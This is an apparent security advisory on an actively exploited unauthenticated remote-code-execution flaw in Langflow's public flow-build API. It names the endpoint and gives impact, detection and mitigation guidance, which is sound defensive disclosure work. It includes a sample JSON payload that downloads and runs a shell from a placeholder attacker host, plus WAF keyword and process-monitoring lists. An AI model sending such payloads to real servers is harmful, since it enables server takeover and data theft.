Critical Unauthenticated RCE Flaw (CVE-2026-33017) in Langflow AI Platform Actively Exploited

Critical Unauthenticated RCE Vulnerability Reported in Langflow AI Platform

CRITICAL
February 26, 2026
6m read
VulnerabilityCyberattackMalware

Related Entities

Products & Tech

Langflow

Other

Aviral Srivastava

CVE Identifiers

CVE-2026-33017
CRITICAL
CVSS:9.3
CVEDetails.com CVE.org

MITRE ATT&CK Techniques

T1190Initial Access

Exploit Public-Facing Application

T1059.006Execution

Python

T1547.001Persistence

Registry Run Keys / Startup Folder

Full Report

Executive Summary

A critical unauthenticated remote code execution (RCE) vulnerability, CVE-2026-33017, has been discovered in Langflow, a popular open-source user interface for building AI applications. The flaw, reported by researcher Aviral Srivastava on February 26, 2026, allows a remote attacker to execute arbitrary Python code on a server running a vulnerable version of Langflow without any authentication. The vulnerability stems from an insecure use of the exec() function in a public API endpoint. Due to its simplicity and high impact, attackers were able to create and deploy exploits within 20 hours of the public disclosure, leading to active exploitation in the wild. This incident underscores the growing security risks associated with the rapid adoption of AI development tools and infrastructure.

Vulnerability Details

The vulnerability resides in the POST /api/v1/build_public_tmp/{flow_id}/flow API endpoint. This endpoint is designed to allow the building of public flows without authentication. However, it improperly trusts user-supplied input.

An attacker can send a crafted HTTP request to this endpoint containing a malicious flow definition within the data parameter. This data, which includes Python code, is passed directly to a server-side exec() function without proper sanitization or sandboxing. This allows the attacker to execute any Python code they desire with the privileges of the Langflow application.

Example Malicious Payload (Conceptual):

{
  "data": {
    "nodes": [
      {
        "data": {
          "node": {
            "template": {
              "code": {
                "value": "import os; os.system('wget http://attacker.com/shell -O /tmp/shell; chmod +x /tmp/shell; /tmp/shell')"
              }
            }
          }
        }
      }
    ]
  }
}

Affected Systems

  • Langflow versions prior to and including 1.8.1 are reportedly affected.

The Langflow development team has addressed the issue in a subsequent development version. Users are urged to upgrade to the latest version as soon as it becomes available and to restrict access to their Langflow instances in the interim.

Exploitation Status

The vulnerability is under active exploitation. Security researchers observed that exploits were developed and deployed by attackers, including botnets, less than a day after the researcher's public disclosure. This rapid weaponization is typical for critical, easy-to-exploit RCEs. This vulnerability is distinct from a previous Langflow RCE, CVE-2025-3248, but shares a similar root cause of unsanitized input being passed to a dangerous function.

Impact Assessment

Successful exploitation of CVE-2026-33017 grants an attacker full control over the underlying server, leading to severe consequences:

  • Data Exfiltration: Attackers can steal sensitive data stored on the server, including AI models, training data, API keys, and database credentials.
  • System Compromise: The attacker can install backdoors, crypto miners, or other malware to establish persistence on the compromised system.
  • Lateral Movement: The compromised Langflow server can be used as a pivot point to attack other systems within the internal network.
  • Reputational Damage: A compromise of AI infrastructure can damage an organization's reputation and erode customer trust.

IOCs

No specific public IOCs have been released, but any POST requests to the vulnerable endpoint from unknown sources should be considered highly suspicious.

Detection & Response

  • Web Server Log Analysis: Scrutinize web server and reverse proxy logs for any POST requests to the /api/v1/build_public_tmp/ endpoint. Any such requests from untrusted IP addresses are strong indicators of scanning or exploitation.
  • WAF/IPS Signatures: Deploy web application firewall (WAF) or intrusion prevention system (IPS) rules designed to detect and block attempts to exploit this vulnerability.
  • Endpoint Monitoring: On servers running Langflow, monitor for suspicious child processes being spawned by the Langflow application process, such as shell commands (sh, bash), wget, or curl. This aligns with D3FEND's Process Analysis (D3-PA).

Mitigation

  1. Upgrade Langflow: The primary mitigation is to upgrade to a patched version of Langflow as soon as it is released by the developers.
  2. Restrict Access: As an immediate and critical compensating control, ensure that Langflow instances are not exposed directly to the internet. Access should be restricted to trusted users and IP addresses via a firewall, VPN, or other access control mechanism. This is a form of D3FEND's Network Isolation (D3-NI).
  3. Disable Public Flows: If not required, disable the functionality for creating public flows to reduce the attack surface.
  4. Application Sandboxing: Run the Langflow application in a container or sandbox with minimal privileges to limit the impact of a potential RCE.

Timeline of Events

1
February 26, 2026
Security researcher Aviral Srivastava responsibly discloses the RCE vulnerability in Langflow.
2
February 26, 2026
This article was published
3
February 26, 2026
Attackers begin actively exploiting CVE-2026-33017 in the wild, approximately 20 hours after public disclosure.

MITRE ATT&CK Mitigations

Update Software

M1051enterprise

Updating to a patched version of Langflow is the most direct way to remediate the vulnerability.

Mapped D3FEND Techniques:

D3-SU

Limit Access to Resource Over Network

M1035enterprise

Not exposing the Langflow instance to the public internet is a critical compensating control that prevents exploitation.

Mapped D3FEND Techniques:

D3-NI

Application Isolation and Sandboxing

M1048enterprise

Running the application in a restricted environment can limit the damage an attacker can do even if they achieve RCE.

Mapped D3FEND Techniques:

D3-DA

D3FEND Defensive Countermeasures

Network Isolation

D3-NIMaps to MITREM1035
D3FEND

The most immediate and effective countermeasure for CVE-2026-33017 is network isolation. Given that this is an unauthenticated RCE on a public-facing endpoint, organizations must ensure their Langflow instances are not accessible from the public internet. Access should be restricted using a firewall or security group to only allow connections from trusted internal IP ranges or through a secure VPN. This single action removes the initial access vector for remote attackers and serves as a critical compensating control until a patch can be applied. For any AI development tool or similar infrastructure, the default security posture should be internal-only unless there is an explicit and well-vetted business need for public exposure.

Inbound Traffic Filtering

D3-ITFMaps to MITREM1037
D3FEND

For organizations that must expose Langflow, deploying a Web Application Firewall (WAF) with specific rules to filter inbound traffic is essential. A WAF rule can be created to inspect POST requests to the /api/v1/build_public_tmp/* endpoint. The rule should look for and block requests where the data parameter contains suspicious Python keywords like import, os.system, subprocess, or eval. While not foolproof against all obfuscation, this signature-based filtering can block known public exploits and basic attack attempts, providing a valuable layer of defense against the active exploitation of CVE-2026-33017.

Dynamic Analysis

D3-DAMaps to MITREM1048
D3FEND

To contain the impact of a successful RCE, Langflow should be run in a sandboxed or containerized environment with minimal privileges. Using technologies like Docker or gVisor, the application can be isolated from the host operating system and the broader network. The container should have a read-only filesystem where possible, limited network egress capabilities, and run as a non-root user. This means that even if an attacker successfully exploits CVE-2026-33017 and achieves code execution, their actions are confined within the sandbox. They would be unable to easily access sensitive files on the host, install persistent backdoors, or pivot to other systems on the network, thus dramatically reducing the overall impact of the compromise.

Sources & References

Critical Langflow Flaw CVE-2026-33017 Triggers Attacks within 20 Hours of Disclosure
The Hacker News (thehackernews.com) February 26, 2026
Critical Langflow RCE vulnerability exploited within 20 hours
SC Magazine (scmagazine.com) February 26, 2026

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

CVE-2026-33017LangflowRCEAIOpen SourceVulnerability

📢 Share This Article

Help others stay informed about cybersecurity threats